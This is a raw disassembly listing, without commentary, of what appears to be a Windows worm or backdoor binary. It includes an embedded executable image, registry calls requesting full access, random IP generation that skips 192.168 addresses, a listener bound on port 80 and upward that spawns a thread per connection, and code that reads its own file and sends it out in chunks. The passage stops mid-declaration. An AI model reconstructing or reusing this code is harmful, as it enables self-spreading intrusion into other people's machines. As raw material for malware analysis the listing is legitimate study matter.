sub_41BB78 mov byte ptr [ebp-100h], 84h sub byte ptr [ebp-100h], 68h mov eax, ds:10004090h mov edx, eax add edx, 5 push edx mov edx, 0Fh sub edx, ds:10004094h push edx mov edx, 4 sub edx, eax push edx call sub_41B7D2 add esp, 10h or eax, eax jz short loc_41B97F xor eax, eax inc eax jmp loc_41BA28 ; --------------------------------------------------------------------------- loc_41B97F: ; CODE XREF: .data:0041B975j push 104h lea eax, [ebp-205h] push eax push dword ptr [ebp+8] call sub_41BA94 call sub_41BA7C lea eax, [ebp-205h] push eax call sub_41B831 mov byte ptr [ebp-101h], 1Bh add byte ptr [ebp-101h], 1 lea edi, [ebp-215h] lea esi, ds:100040A7h mov ecx, 4 rep movsd push 0FFh lea eax, [ebp-0FFh] push eax call sub_41BAB8 mov eax, ds:100040B7h mov [ebp-21Bh], eax call sub_41BA7C call sub_41BA70 lea eax, [ebp-0FFh] push eax call sub_41B8EB call sub_41BAC4 lea eax, [ebp-215h] push eax lea eax, [ebp-0FFh] push eax call sub_41BB84 add esp, 10h push 1 lea eax, [ebp-0FFh] push eax call sub_41BB00 call sub_41BAAC xor eax, eax inc eax loc_41BA28: ; CODE XREF: .data:0041B97Aj pop edi pop esi leave retn 0Ch ; --------------------------------------------------------------------------- align 10h dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h db 0, 2 ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_41BA53 loc_41BA42: ; CODE XREF: sub_41BA53+Dj fldcw word ptr [esp+4+var_4] pop ecx mov al, ah and eax, 3 retn ; END OF FUNCTION CHUNK FOR sub_41BA53 ; --------------------------------------------------------------------------- dd 243CD950h db 58h, 0EBh, 0F3h ; =============== S U B R O U T I N E ======================================= sub_41BA53 proc near ; CODE XREF: .data:loc_41B581p var_4 = dword ptr -4 ; FUNCTION CHUNK AT 0041BA42 SIZE 0000000A BYTES push eax fnstcw word ptr [esp+4+var_4] mov eax, [esp+4+var_4] or word ptr [esp+4+var_4], 300h jmp short loc_41BA42 sub_41BA53 endp ; --------------------------------------------------------------------------- align 4 dd 50E825FFh, 90901000h, 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BA70 proc near ; CODE XREF: sub_41B831+3Fp ; .data:0041B9E6p jmp dword ptr ds:100050ECh sub_41BA70 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BA7C proc near ; CODE XREF: sub_41B831+Fp ; sub_41B8EB+7p ... jmp dword ptr ds:100050F0h sub_41BA7C endp ; --------------------------------------------------------------------------- dw 9090h align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BA88 proc near ; CODE XREF: sub_41B63C+10p jmp dword ptr ds:100050F4h sub_41BA88 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BA94 proc near ; CODE XREF: .data:0041B98Ep jmp dword ptr ds:100050F8h sub_41BA94 endp ; --------------------------------------------------------------------------- dw 9090h align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAA0 proc near ; CODE XREF: sub_41B7D2+49p jmp dword ptr ds:100050FCh sub_41BAA0 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAAC proc near ; CODE XREF: sub_41B831+14p ; .data:0041BA20p jmp dword ptr ds:10005100h sub_41BAAC endp ; --------------------------------------------------------------------------- dw 9090h align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAB8 proc near ; CODE XREF: .data:0041B9D1p jmp dword ptr ds:10005104h sub_41BAB8 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAC4 proc near ; CODE XREF: sub_41B7D2+16p ; sub_41B831+48p ... jmp dword ptr ds:10005108h sub_41BAC4 endp ; --------------------------------------------------------------------------- dw 9090h align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAD0 proc near ; CODE XREF: sub_41B831+B0p jmp dword ptr ds:1000510Ch sub_41BAD0 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BADC proc near ; CODE XREF: sub_41B831+ABp jmp dword ptr ds:10005110h sub_41BADC endp ; --------------------------------------------------------------------------- dw 9090h align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAE8 proc near ; CODE XREF: sub_41B7D2+32p jmp dword ptr ds:10005114h sub_41BAE8 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BAF4 proc near ; CODE XREF: sub_41B45A+13p jmp dword ptr ds:10005118h sub_41BAF4 endp ; --------------------------------------------------------------------------- dw 9090h align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB00 proc near ; CODE XREF: .data:0041BA1Bp jmp dword ptr ds:1000511Ch sub_41BB00 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB0C proc near ; CODE XREF: sub_41B5A4+33p ; sub_41B5A4+45p ... jmp dword ptr ds:10005128h sub_41BB0C endp ; --------------------------------------------------------------------------- dw 9090h align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB18 proc near ; CODE XREF: sub_41B5A4+Bp ; sub_41B5A4+17p ... jmp dword ptr ds:1000512Ch sub_41BB18 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 dd 513025FFh, 90901000h, 0 dd 513425FFh, 90901000h, 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB3C proc near ; CODE XREF: sub_41B63C+58p ; sub_41B63C+96p jmp dword ptr ds:10005138h sub_41BB3C endp ; --------------------------------------------------------------------------- dw 9090h align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB48 proc near ; CODE XREF: sub_41B728+23p jmp dword ptr ds:1000513Ch sub_41BB48 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 dd 514025FFh, 90901000h, 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB60 proc near ; CODE XREF: .data:0041B560p jmp dword ptr ds:10005144h sub_41BB60 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB6C proc near ; CODE XREF: sub_41B5A4+71p ; sub_41B5A4+86p jmp dword ptr ds:10005148h sub_41BB6C endp ; --------------------------------------------------------------------------- dw 9090h align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB78 proc near ; CODE XREF: .data:0041B939p jmp dword ptr ds:1000514Ch sub_41BB78 endp ; --------------------------------------------------------------------------- dw 9090h dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB84 proc near ; CODE XREF: sub_41B8EB+14p ; .data:0041BA0Ap jmp dword ptr ds:10005150h sub_41BB84 endp ; --------------------------------------------------------------------------- dw 9090h align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41BB90 proc near ; CODE XREF: sub_41B63C+B7p jmp dword ptr ds:10005154h sub_41BB90 endp ; --------------------------------------------------------------------------- dw 9090h dd 14h dup(0) dd 2 dup(1), 7Ch dup(0) dd 10001536h, 5 dup(0) dd 7325h, 720077h, 1Ch dup(0) dd 2, 0Ch, 0 dd 3B4E2A00h, 734D3E5Ah db 0, 4Bh, 0 aDnpbikeo db 'Dnpbikeo',0 ; DATA XREF: sub_40284A+1C2o aJklmno db 'jklmno',0 aAy db 'Ay&',0 db '\',0 aTtii db '’’ˆë»',0 align 4 dd 4Fh dup(0) dd 5070h, 2 dup(0) dd 52F8h, 50E8h, 50B0h, 2 dup(0) dd 5340h, 5128h, 12h dup(0) dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0) dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0) dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0) dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h dd 52CCh, 52D8h, 52E0h, 52ECh, 0 dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h dd 746E6572h, 65726854h, 64496461h, 0 dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h dd 4173676Eh, 0 dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h dd 0 dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h dd 73736563h, 70616548h, 0 dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch dd 72655674h, 6E6F6973h, 0 dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0 dd 704F01D2h, 754D6E65h, 41786574h, 0 dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0 dd 635F0039h, 74697865h, 0 dd 616D024Eh, 636F6C6Ch, 0 dd 656D0254h, 7970636Dh, 0 dd 7270025Bh, 66746E69h, 0 dd 61720260h, 657369h, 65730267h, 66756274h, 0 dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0 dd 74730275h, 79706372h, 0 aKernel32_dll_2 db 'KERNEL32.DLL',0 align 4 dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h) dd 22h dup(0) dd 20h, 0 dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0) dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch dd 33783374h, 4Ah dup(0) aB_0 db 0Ah db 'µ|B',0 align 4 aP db '(p',0 align 10h dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h dd 703Ch, 0 a_libmain@12 db '_LibMain@12',0 dd 6Eh dup(0) db 0 byte_41C9E1 db 4Dh, 5Ah, 90h ; DATA XREF: sub_402784+6Ao dd 300h, 400h, 0FFFF00h, 0B800h, 0 dd 4000h, 8 dup(0) dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0 dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0 dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h dd 0 dd 400h, 0 dd 600000h, 40000h, 0 dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0 dd 1000h, 2 dup(0) dd 500000h, 97000h, 1Ch dup(0) dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h dd 3 dup(0) dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0) dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h dd 1E0000h, 3 dup(0) dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h dd 2C0000h, 3 dup(0) dd 6000h, 0C0h, 79h dup(0) dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh dd 24548B08h, 0B8028910h, 3 db 0C3h ; =============== S U B R O U T I N E ======================================= sub_41CE01 proc near ; CODE XREF: .data:0041CF39p ; .data:0041CF67p var_14 = dword ptr -14h arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx push esi push edi mov eax, [esp+0Ch+arg_0] push eax push 0FFFFFFFEh push offset sub_401000 push large dword ptr fs:0 mov large fs:0, esp loc_41CE1E: ; CODE XREF: sub_41CE01+44j ; sub_41CE01+4Aj mov eax, [esp+1Ch+arg_0] mov ebx, [eax+8] mov esi, [eax+0Ch] cmp esi, 0FFFFFFFFh jz short loc_41CE4D cmp esi, [esp+1Ch+arg_4] jz short loc_41CE4D lea esi, [esi+esi*2] mov ecx, [ebx+esi*4] mov ecx, [esp+1Ch+var_14] mov ecx, [eax+0Ch] cmp dword ptr [ebx+esi*4+4], 0 jnz short loc_41CE1E call dword ptr [ebx+esi*4+8] jmp short loc_41CE1E ; --------------------------------------------------------------------------- loc_41CE4D: ; CODE XREF: sub_41CE01+2Aj ; sub_41CE01+30j pop large dword ptr fs:0 add esp, 0Ch pop edi pop esi pop ebx retn sub_41CE01 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41CE5B proc near ; CODE XREF: .data:0041CF2Cp arg_0 = dword ptr 8 push ebp mov ebp, esp push ebx push esi push edi push ebp push 0 push 0 push offset sub_401092 push [ebp+arg_0] call sub_41E599 pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn sub_41CE5B endp ; --------------------------------------------------------------------------- db 0FCh ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 8 push ebx push esi push edi push ebp mov ebx, [ebp+0Ch] mov eax, [ebp+8] mov dword ptr ds:loc_40408C, eax mov dword ptr ds:loc_40408C+4, ebx test dword ptr [eax+4], 6 jnz loc_41CF60 mov [ebp-8], eax mov eax, [ebp+10h] mov [ebp-4], eax mov dword ptr ds:loc_40408C+4, eax lea eax, [ebp-8] mov [ebx-4], eax mov esi, [ebx+0Ch] mov edi, [ebx+8] loc_41CEBE: ; CODE XREF: .data:0041CF57j cmp esi, 0FFFFFFFFh jz loc_41CF6F lea ecx, [esi+esi*2] cmp dword ptr [edi+ecx*4+4], 0 jz short loc_41CF4E push esi push ebp lea ebp, [ebx+10h] mov eax, [ebp-14h] mov eax, [eax] mov eax, [eax] mov dword ptr ds:loc_40402D+3, eax mov edx, [ebp-14h] mov eax, [edx] mov dword ptr ds:loc_404032+2, eax mov eax, [edx+4] mov dword ptr ds:loc_404038, eax push esi push edi push ecx mov ecx, 14h lea edi, loc_40403B+1 mov esi, dword ptr ds:loc_404032+2 rep movsd lea edi, loc_40403B+1 mov dword ptr ds:loc_404032+2, edi pop ecx pop edi pop esi call dword ptr [edi+ecx*4+4] pop ebp pop esi mov ebx, [ebp+0Ch] or eax, eax jz short loc_41CF4E js short loc_41CF5C mov edi, [ebx+8] push ebx call sub_41CE5B add esp, 4 lea ebp, [ebx+10h] push esi push ebx call sub_41CE01 add esp, 8 lea ecx, [esi+esi*2] mov eax, [edi+ecx*4] mov eax, [ebx+0Ch] call dword ptr [edi+ecx*4+8] loc_41CF4E: ; CODE XREF: .data:0041CECFj ; .data:0041CF24j mov edi, [ebx+8] lea ecx, [esi+esi*2] mov esi, [edi+ecx*4] jmp loc_41CEBE ; --------------------------------------------------------------------------- loc_41CF5C: ; CODE XREF: .data:0041CF26j xor eax, eax jmp short loc_41CFD1 ; --------------------------------------------------------------------------- loc_41CF60: ; CODE XREF: .data:0041CE9Ej push ebp lea ebp, [ebx+10h] push 0FFFFFFFFh push ebx call sub_41CE01 add esp, 0Ch loc_41CF6F: ; CODE XREF: .data:0041CEC1j push 0 mov dword ptr ds:loc_40400C+4, 0Bh push 0Bh call sub_41E73D add esp, 8 or eax, eax jnz short loc_41CFAA push 0 mov dword ptr ds:loc_40400C+4, 8 push 8 call sub_41E73D add esp, 8 or eax, eax jnz short loc_41CFAA mov eax, 1 jmp short loc_41CFD1 ; --------------------------------------------------------------------------- loc_41CFAA: ; CODE XREF: .data:0041CF87j ; .data:0041CFA1j cmp eax, 0FFFFFFFFh jz short loc_41CFD9 push eax push dword ptr ds:loc_40400C+4 call sub_41E73D add esp, 8 push dword ptr ds:loc_40400C+4 call sub_41E725 add esp, 4 mov eax, 1 loc_41CFD1: ; CODE XREF: .data:0041CF5Ej ; .data:0041CFA8j ... pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn ; --------------------------------------------------------------------------- loc_41CFD9: ; CODE XREF: .data:0041CFADj cmp dword ptr ds:loc_40402A+2, 0 jnz short loc_41CFE9 mov eax, 1 jmp short loc_41CFD1 ; --------------------------------------------------------------------------- loc_41CFE9: ; CODE XREF: .data:0041CFE0j mov eax, dword ptr ds:loc_40402A+2 push 0Bh jmp eax ; --------------------------------------------------------------------------- dw 0B858h dd 1, 0A164D7EBh, 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp push 0FFFFFFFFh push 40401Ch push offset sub_40109A push eax mov large fs:0, esp sub esp, 10h push ebx push esi push edi mov [ebp-18h], esp push eax fnstcw word ptr [esp] or word ptr [esp], 300h fldcw word ptr [esp] add esp, 4 push 0 push 0 push 404028h push 404024h push 404020h call sub_41E6E9 push dword ptr ds:loc_404023+5 push dword ptr ds:loc_404023+1 push dword ptr ds:loc_40401E+2 mov dword ptr ds:loc_404014, esp call sub_41E441 add esp, 18h xor ecx, ecx mov [ebp-4], ecx push eax call sub_41E701 leave retn ; --------------------------------------------------------------------------- db 64h, 0A3h, 0 dd 0C3000000h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D07D proc near ; CODE XREF: sub_41D118+12p var_35 = byte ptr -35h var_3 = byte ptr -3 var_2 = byte ptr -2 var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi mov edi, [ebp+arg_4] push 2 lea eax, [ebp+var_35] push eax push [ebp+arg_0] call sub_41E6DD add esp, 0Ch lea ecx, [ebp+var_35] or eax, 0FFFFFFFFh loc_41D0A0: ; CODE XREF: sub_41D07D+28j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_41D0A0 mov ebx, eax mov [ebp+var_2], bl mov [ebp+var_1], 0 jmp short loc_41D0C8 ; --------------------------------------------------------------------------- loc_41D0B2: ; CODE XREF: sub_41D07D+55j movzx eax, [ebp+var_1] movzx edx, [ebp+var_2] sub edx, eax dec edx mov al, [ebp+eax+var_35] mov [edi+edx], al add [ebp+var_1], 1 loc_41D0C8: ; CODE XREF: sub_41D07D+33j movzx eax, [ebp+var_1] movzx edx, [ebp+var_2] cmp eax, edx jl short loc_41D0B2 movzx eax, [ebp+var_2] mov byte ptr [edi+eax], 0 mov [ebp+var_3], 0 jmp short loc_41D0F4 ; --------------------------------------------------------------------------- loc_41D0E2: ; CODE XREF: sub_41D07D+88j push offset sub_404DE5 push edi call sub_41E761 add esp, 8 add [ebp+var_3], 1 loc_41D0F4: ; CODE XREF: sub_41D07D+63j movzx eax, [ebp+var_3] mov edx, 20h movzx ecx, [ebp+var_2] sub edx, ecx cmp eax, edx jl short loc_41D0E2 push [ebp+arg_8] push edi call sub_41E761 add esp, 8 pop edi pop esi pop ebx leave retn sub_41D07D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D118 proc near ; CODE XREF: sub_41E239+97p var_32 = byte ptr -32h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 34h push 404DE3h lea eax, [ebp+var_32] push eax push [ebp+arg_0] call sub_41D07D add esp, 0Ch lea eax, [ebp+var_32] push eax call sub_41E551 leave retn sub_41D118 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D13D proc near ; CODE XREF: .data:0041E1F7p ; sub_41E239+F1p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push ecx push eax push edi lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push 0 push 0F003Fh push 0 push 0 push 0 push [ebp+arg_4] push [ebp+arg_0] call sub_41E6A1 mov edi, eax or edi, edi jz short loc_41D16D xor eax, eax jmp short loc_41D1A5 ; --------------------------------------------------------------------------- loc_41D16D: ; CODE XREF: sub_41D13D+2Aj push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_14] push 0 push [ebp+arg_8] push [ebp+var_4] call sub_41E6D1 mov edi, eax push [ebp+var_4] call sub_41E6AD or edi, edi jz short loc_41D195 xor eax, eax jmp short loc_41D1A5 ; --------------------------------------------------------------------------- loc_41D195: ; CODE XREF: sub_41D13D+52j cmp [ebp+var_8], 1 jnz short loc_41D1A2 mov eax, 2 jmp short loc_41D1A5 ; --------------------------------------------------------------------------- loc_41D1A2: ; CODE XREF: sub_41D13D+5Cj xor eax, eax inc eax loc_41D1A5: ; CODE XREF: sub_41D13D+2Ej ; sub_41D13D+56j ... pop edi leave retn sub_41D13D endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D1A8 proc near ; CODE XREF: .data:0041E1D0p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push ecx push edi lea eax, [ebp+var_4] push eax push 20019h push 0 push [ebp+arg_4] push [ebp+arg_0] call sub_41E6B9 mov edi, eax or edi, edi jz short loc_41D1CD xor eax, eax jmp short loc_41D1F8 ; --------------------------------------------------------------------------- loc_41D1CD: ; CODE XREF: sub_41D1A8+1Fj push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_14] push 0 push [ebp+arg_8] push [ebp+var_4] call sub_41E6C5 mov edi, eax push [ebp+var_4] call sub_41E6AD or edi, edi jz short loc_41D1F5 xor eax, eax jmp short loc_41D1F8 ; --------------------------------------------------------------------------- loc_41D1F5: ; CODE XREF: sub_41D1A8+47j xor eax, eax inc eax loc_41D1F8: ; CODE XREF: sub_41D1A8+23j ; sub_41D1A8+4Bj pop edi leave retn sub_41D1A8 endp ; sp-analysis failed ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 200h push ebx push esi push edi xor ebx, ebx push 0 push 100h lea eax, [ebp-100h] push eax push dword ptr [ebp+8] call sub_41E3F9 cmp eax, 0FFFFFFFFh jz loc_41D33F push 404DDFh lea eax, [ebp-100h] push eax call sub_41E779 add esp, 8 or eax, eax jz loc_41D301 push 404DDBh lea edx, [ebp-100h] push edx call sub_41E779 add esp, 8 or eax, eax jz loc_41D301 push 0 push 3Dh push 404D9Dh push dword ptr [ebp+8] call sub_41E405 push dword ptr ds:loc_403000+4 push 404D86h lea eax, [ebp-200h] push eax call sub_41E749 add esp, 0Ch lea ecx, [ebp-200h] or eax, 0FFFFFFFFh loc_41D294: ; CODE XREF: .data:0041D299j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_41D294 push 0 push eax lea edx, [ebp-200h] push edx push dword ptr [ebp+8] call sub_41E405 loc_41D2AD: ; CODE XREF: .data:0041D2F3j mov eax, dword ptr ds:loc_403000+4 mov edi, eax sub edi, ebx cmp edi, 1000h jb short loc_41D2C3 mov edi, 1000h loc_41D2C3: ; CODE XREF: .data:0041D2BCj or edi, edi jz short loc_41D2F5 push 0 push edi mov eax, ebx add eax, dword ptr ds:loc_403005+3 push eax push dword ptr [ebp+8] call sub_41E405 mov esi, eax cmp esi, 0FFFFFFFFh jz short loc_41D33F cmp esi, 1000h jb short loc_41D2F5 add ebx, esi push 64h call sub_41E5B1 jmp short loc_41D2AD ; --------------------------------------------------------------------------- loc_41D2F5: ; CODE XREF: .data:0041D2C5j ; .data:0041D2E8j push 404098h call sub_41E569 jmp short loc_41D323 ; --------------------------------------------------------------------------- loc_41D301: ; CODE XREF: .data:0041D23Ej ; .data:0041D25Aj push 0 push 15h push offset sub_404D70 push dword ptr [ebp+8] call sub_41E405 push 0 push 0Dh push offset sub_40409C push dword ptr [ebp+8] call sub_41E405 loc_41D323: ; CODE XREF: .data:0041D2FFj push 7D0h call sub_41E5B1 push 2 push dword ptr [ebp+8] call sub_41E411 push dword ptr [ebp+8] call sub_41E399 loc_41D33F: ; CODE XREF: .data:0041D222j ; .data:0041D2E0j pop edi pop esi pop ebx leave retn 4 ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 34h push ebx push esi push edi push 0 push 404098h call sub_41E55D push 0 push 80h push 3 push 0 push 1 push 80000000h push offset sub_403010 call sub_41E581 mov ebx, eax cmp ebx, 0FFFFFFFFh jnz short loc_41D385 push 1 call sub_41E4F1 loc_41D385: ; CODE XREF: .data:0041D37Cj push 0 push ebx call sub_41E515 mov dword ptr ds:loc_403000+4, eax push eax push 0 call sub_41E575 mov dword ptr ds:loc_403005+3, eax push 0 lea eax, [ebp-30h] push eax push dword ptr ds:loc_403000+4 push dword ptr ds:loc_403005+3 push ebx call sub_41E58D push ebx call sub_41E52D push 0 push 1 push 2 call sub_41E41D mov esi, eax push 10h lea eax, [ebp-24h] push eax call sub_41E5A5 mov word ptr [ebp-24h], 2 and dword ptr [ebp-20h], 0 mov word ptr [ebp-26h], 0 loc_41D3E5: ; CODE XREF: .data:0041D425j movzx eax, word ptr [ebp-26h] add eax, 50h mov word ptr ds:loc_404092+2, ax movzx eax, word ptr ds:loc_404092+2 push eax call sub_41E3C9 mov edx, eax mov [ebp-22h], dx push 10h lea eax, [ebp-24h] push eax push esi call sub_41E38D mov [ebp-2Ch], eax inc word ptr [ebp-26h] or eax, eax jz short loc_41D427 movzx eax, word ptr [ebp-26h] cmp eax, 0FDE8h jl short loc_41D3E5 loc_41D427: ; CODE XREF: .data:0041D41Aj push 64h push esi call sub_41E3ED mov dword ptr [ebp-4], 10h loc_41D436: ; CODE XREF: .data:0041D461j lea eax, [ebp-4] push eax lea eax, [ebp-14h] push eax push esi call sub_41E381 mov edi, eax lea eax, [ebp-34h] push eax push 0 push edi push 40141Ah push 0 push 0 call sub_41E5D5 push eax call sub_41E52D jmp short loc_41D436 ; --------------------------------------------------------------------------- db 5Fh dd 0C3C95B5Eh ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D468 proc near ; CODE XREF: .data:0041DC9Bp var_1B = byte ptr -1Bh var_1A = byte ptr -1Ah var_19 = byte ptr -19h var_18 = byte ptr -18h var_13 = byte ptr -13h var_3 = byte ptr -3 var_2 = word ptr -2 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 1Ch push ebx push esi push edi lea edi, [ebp+var_13] lea esi, loc_4040A7+3 mov ecx, 4 rep movsd lea edi, [ebp+var_18] lea esi, loc_4040B2+8 mov ecx, 5 rep movsb loc_41D491: ; CODE XREF: sub_41D468+51j ; sub_41D468+74j call sub_41E731 mov ecx, 0DDh cdq idiv ecx lea edi, [edx+3] mov ebx, edi mov [ebp+var_3], bl mov [ebp+var_2], 0 jmp short loc_41D4E2 ; --------------------------------------------------------------------------- loc_41D4AE: ; CODE XREF: sub_41D468+81j mov al, [ebp+var_3] movzx edx, [ebp+var_2] cmp al, [ebp+edx+var_13] jz short loc_41D491 movzx eax, [ebp+var_2] cmp eax, 5 jnb short loc_41D4DE movzx eax, [ebp+var_3] movzx edx, [ebp+var_2] movzx ecx, [ebp+edx+var_13] cmp eax, ecx jb short loc_41D4DE movzx edx, [ebp+edx+var_18] cmp eax, edx jbe short loc_41D491 loc_41D4DE: ; CODE XREF: sub_41D468+5Aj ; sub_41D468+6Bj inc [ebp+var_2] loc_41D4E2: ; CODE XREF: sub_41D468+44j movzx eax, [ebp+var_2] cmp eax, 10h jb short loc_41D4AE loc_41D4EB: ; CODE XREF: sub_41D468+ACj call sub_41E731 mov ecx, 0FDh cdq idiv ecx lea edi, [edx+1] mov ebx, edi mov [ebp+var_19], bl movzx eax, [ebp+var_3] cmp eax, 0C0h jnz short loc_41D516 movzx eax, [ebp+var_19] cmp eax, 0A8h jz short loc_41D4EB loc_41D516: ; CODE XREF: sub_41D468+A1j call sub_41E731 mov ecx, 0FDh cdq idiv ecx lea edi, [edx+1] mov ebx, edi mov [ebp+var_1A], bl call sub_41E731 mov ecx, 0FDh cdq idiv ecx lea edi, [edx+1] mov ebx, edi mov [ebp+var_1B], bl movzx eax, [ebp+var_1B] push eax movzx eax, [ebp+var_1A] push eax movzx eax, [ebp+var_19] push eax movzx eax, [ebp+var_3] push eax push 404D64h push [ebp+arg_0] call sub_41E749 add esp, 18h pop edi pop esi pop ebx leave retn sub_41D468 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D569 proc near ; CODE XREF: .data:0041DEA0p var_89F4 = dword ptr -89F4h var_89F0 = dword ptr -89F0h var_89EC = dword ptr -89ECh var_89E8 = dword ptr -89E8h var_89E3 